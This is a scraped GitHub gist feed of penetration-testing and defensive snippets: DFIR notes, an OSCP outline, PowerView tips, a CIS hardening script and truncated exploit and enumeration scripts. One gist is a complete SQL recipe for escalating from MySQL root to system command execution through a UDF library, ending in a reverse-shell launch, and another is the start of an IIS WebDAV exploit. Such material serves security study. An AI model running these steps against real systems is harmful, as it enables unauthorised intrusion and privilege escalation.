Skip to content

Instantly share code, notes, and snippets.

View rahmiy's full-sized avatar

Rahmi YILDIZ rahmiy

53 followers · 782 following
View GitHub Profile
@p0c
p0c / mysql_root_to_system_root
Last active August 14, 2021 23:58
#pentest #recipe: mysql root -> system root (linux)
# download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql
# (currently not present in kali's sqlmap, only the windows one, the same for metasploit...)
mysql> use mysql;
mysql> create table test(line blob);
mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('./reverse_shell &');
@graysonchao
graysonchao / DFIR.md
Last active January 19, 2024 11:51
Digital Forensics & Incident Response Notes (cleanup in progress)

#DFIR These are my notes from BlackHat 2016 Digital Forensics & Incident Response Training

##Windows Drive Forensics NTFS: host default <---- Course focus ReFS: eventually the host default (not yet) <---- basically nothing FAT: external drives <--- a little focus ExFat: high-cap external drives <--- basically nothing

Our tools will mostly deal with NTFS and FAT.

@unfo
unfo / how-to-oscp-final.md
Last active September 23, 2024 17:38

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@mgeeky
mgeeky / iis_webdav_upload.py
Last active July 25, 2023 17:39
Microsoft IIS WebDAV Write Code Execution exploit (based on Metasploit HDM's <iis_webdav_upload_asp> implementation)
#!/usr/bin/python
import requests
import string
import random
import sys
def randstring(N = 6):
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(N))
@unfo
unfo / enum.sh
Created April 7, 2017 14:30
Linux priv esc. Might be out-dated script versions
#!/bin/bash
BLACK="\033[30m"
RED="\033[31m"
GREEN="\033[32m"
YELLOW="\033[33m"
BLUE="\033[34m"
PINK="\033[35m"
CYAN="\033[36m"
WHITE="\033[37m"
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active April 6, 2025 17:09
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@vector-sec
vector-sec / Get-Token.ps1
Created August 10, 2017 17:51
PowerShell script to enumerate all Process and Thread tokens.
function Get-Token
{
foreach($proc in (Get-Process))
{
if($proc.Id -ne 0 -and $proc.Id -ne 4)
{
try
{
$hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION
}
@nitefood
nitefood / README.md
Last active May 8, 2023 00:45
ASN/IP/Route/hostname command line lookup tool to map any network to the corresponding ASN and prefix

This gist has moved to its own repository HERE

See you there!

@todmephis
todmephis / cis_centos7_hardening.sh
Last active February 26, 2025 10:00
Hardening CentOS 7 CIS script
#!/bin/bash
MODPROBEFILE="/etc/modprobe.d/CIS.conf"
#MODPROBEFILE="/tmp/CIS.conf"
ANSWER=0
analyze_part () {
if [ "$#" != "1" ]; then
options="$(echo $@ | awk 'BEGIN{FS="[()]"}{print $2}')"
echo "[+]$@"
apply_part_rule $1
@JohnLaTwC
JohnLaTwC / 7d82ef55ea5f59a09c42d4c423a6e0ea33731c7e0d1f59509df390656377fea2
Created May 2, 2019 16:12
https://www.virustotal.com/#/file/7d82ef55ea5f59a09c42d4c423a6e0ea33731c7e0d1f59509df390656377fea2/detection
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description: Performs various techniques to dump hashes from the
# remote machine without executing any agent there.
# For SAM and LSA Secrets (including cached creds)
# we try to read as much as we can from the registry